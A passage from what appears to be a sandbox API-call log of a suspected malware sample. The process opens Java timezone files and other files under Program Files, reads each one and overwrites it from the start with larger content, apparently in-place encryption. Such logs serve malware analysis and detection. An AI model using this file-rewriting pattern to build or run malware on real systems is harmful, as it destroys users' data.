lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Uzhgorod", lpUsedDefaultChar=0x0) returned 8 [0132.522] ReadFile (in: hFile=0x204, lpBuffer=0x269c668, nNumberOfBytesToRead=0x41c, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x2b1f2bc*=0x41c, lpOverlapped=0x0) returned 1 [0132.962] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0132.962] WriteFile (in: hFile=0x204, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9a4, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x9a4, lpOverlapped=0x0) returned 1 [0132.962] CloseHandle (hObject=0x204) returned 1 [0132.963] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\GMT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\gmt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0132.964] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.964] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1b [0132.964] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.964] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.964] ReleaseMutex (hMutex=0x168) returned 1 [0132.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0132.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT", cchWideChar=3, lpMultiByteStr=0x1f7ad14, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT", lpUsedDefaultChar=0x0) returned 3 [0132.964] ReadFile (in: hFile=0x204, lpBuffer=0x1f88d30, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88d30*, lpNumberOfBytesRead=0x2b1f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0132.966] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0132.966] WriteFile (in: hFile=0x204, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0132.966] CloseHandle (hObject=0x204) returned 1 [0132.966] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mahe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mahe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0132.967] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.967] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x41 [0132.967] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.967] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.967] ReleaseMutex (hMutex=0x168) returned 1 [0132.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mahe", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0132.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mahe", cchWideChar=4, lpMultiByteStr=0x1f7acfc, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mahe", lpUsedDefaultChar=0x0) returned 4 [0132.968] ReadFile (in: hFile=0x204, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x2b1f2bc*=0x41, lpOverlapped=0x0) returned 1 [0132.969] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0132.969] WriteFile (in: hFile=0x204, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0132.969] CloseHandle (hObject=0x204) returned 1 [0132.969] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Apia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\apia"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0132.970] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.970] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x238 [0132.970] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.971] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.971] ReleaseMutex (hMutex=0x168) returned 1 [0132.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Apia", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0132.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Apia", cchWideChar=4, lpMultiByteStr=0x1f7acfc, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Apia", lpUsedDefaultChar=0x0) returned 4 [0132.971] ReadFile (in: hFile=0x204, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x238, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x2b1f2bc*=0x238, lpOverlapped=0x0) returned 1 [0132.972] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0132.972] WriteFile (in: hFile=0x204, lpBuffer=0x25a0038*, nNumberOfBytesToWrite=0x7c0, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a0038*, lpNumberOfBytesWritten=0x2b1f2d0*=0x7c0, lpOverlapped=0x0) returned 1 [0132.973] CloseHandle (hObject=0x204) returned 1 [0132.973] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fiji" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\fiji"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0132.974] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.974] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x24c [0132.974] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.974] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.974] ReleaseMutex (hMutex=0x168) returned 1 [0132.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Fiji", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0132.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Fiji", cchWideChar=4, lpMultiByteStr=0x1f7acfc, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fiji", lpUsedDefaultChar=0x0) returned 4 [0132.974] ReadFile (in: hFile=0x204, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x24c, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x2b1f2bc*=0x24c, lpOverlapped=0x0) returned 1 [0132.976] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0132.976] WriteFile (in: hFile=0x204, lpBuffer=0x25a0038*, nNumberOfBytesToWrite=0x7d4, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a0038*, lpNumberOfBytesWritten=0x2b1f2d0*=0x7d4, lpOverlapped=0x0) returned 1 [0132.976] CloseHandle (hObject=0x204) returned 1 [0132.976] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kiritimati" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kiritimati"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0132.977] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.977] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x59 [0132.977] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0132.977] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.977] ReleaseMutex (hMutex=0x168) returned 1 [0132.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kiritimati", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0132.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kiritimati", cchWideChar=10, lpMultiByteStr=0x1f7358c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Kiritimati", lpUsedDefaultChar=0x0) returned 10 [0132.977] ReadFile (in: hFile=0x204, lpBuffer=0x1fbafe0, nNumberOfBytesToRead=0x59, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbafe0*, lpNumberOfBytesRead=0x2b1f2bc*=0x59, lpOverlapped=0x0) returned 1 [0132.978] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0132.979] WriteFile (in: hFile=0x204, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e1, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5e1, lpOverlapped=0x0) returned 1 [0132.979] CloseHandle (hObject=0x204) returned 1 [0132.979] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Norfolk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\norfolk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0135.754] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0135.754] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4d [0135.754] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0135.754] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.754] ReleaseMutex (hMutex=0x168) returned 1 [0135.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Norfolk", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0135.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Norfolk", cchWideChar=7, lpMultiByteStr=0x1f7acfc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Norfolk", lpUsedDefaultChar=0x0) returned 7 [0135.755] ReadFile (in: hFile=0x20c, lpBuffer=0x1f9fc48, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fc48*, lpNumberOfBytesRead=0x2b1f2bc*=0x4d, lpOverlapped=0x0) returned 1 [0135.762] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0135.762] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0135.766] CloseHandle (hObject=0x20c) returned 1 [0135.767] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Saipan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\saipan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0135.768] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0135.768] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4d [0135.768] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0135.768] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.769] ReleaseMutex (hMutex=0x168) returned 1 [0135.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Saipan", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0135.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Saipan", cchWideChar=6, lpMultiByteStr=0x1f7acfc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Saipan", lpUsedDefaultChar=0x0) returned 6 [0135.769] ReadFile (in: hFile=0x20c, lpBuffer=0x1f9fc48, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fc48*, lpNumberOfBytesRead=0x2b1f2bc*=0x4d, lpOverlapped=0x0) returned 1 [0135.770] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0135.770] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0135.770] CloseHandle (hObject=0x20c) returned 1 [0135.770] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4ADT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\ast4adt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0135.927] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0135.927] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x8f0 [0135.928] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0135.928] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.928] ReleaseMutex (hMutex=0x168) returned 1 [0135.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AST4ADT", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0135.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AST4ADT", cchWideChar=7, lpMultiByteStr=0x1f7acfc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AST4ADT", lpUsedDefaultChar=0x0) returned 7 [0135.928] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f968, nNumberOfBytesToRead=0x8f0, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesRead=0x2b1f2bc*=0x8f0, lpOverlapped=0x0) returned 1 [0135.982] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0135.982] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0xe78, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2b1f2d0*=0xe78, lpOverlapped=0x0) returned 1 [0135.982] CloseHandle (hObject=0x1dc) returned 1 [0135.983] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\pst8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0136.023] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.023] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1b [0136.023] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.023] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.023] ReleaseMutex (hMutex=0x168) returned 1 [0136.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PST8", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0136.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PST8", cchWideChar=4, lpMultiByteStr=0x1f7ace4, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PST8", lpUsedDefaultChar=0x0) returned 4 [0136.024] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f88ba0, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88ba0*, lpNumberOfBytesRead=0x2b1f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0136.024] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0136.024] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0136.025] CloseHandle (hObject=0x1f0) returned 1 [0136.025] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\release" (normalized: "c:\\program files (x86)\\java\\jre7\\release"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0136.026] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.026] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1fa [0136.026] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.027] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.027] ReleaseMutex (hMutex=0x168) returned 1 [0136.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="release", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0136.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="release", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="release", lpUsedDefaultChar=0x0) returned 7 [0136.027] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1fa, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x2b1f2bc*=0x1fa, lpOverlapped=0x0) returned 1 [0136.028] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0136.028] WriteFile (in: hFile=0x1f0, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x782, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x782, lpOverlapped=0x0) returned 1 [0136.028] CloseHandle (hObject=0x1f0) returned 1 [0136.029] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0136.030] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.030] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x851c [0136.030] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.030] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.030] ReleaseMutex (hMutex=0x168) returned 1 [0136.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql2000.xsl", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, 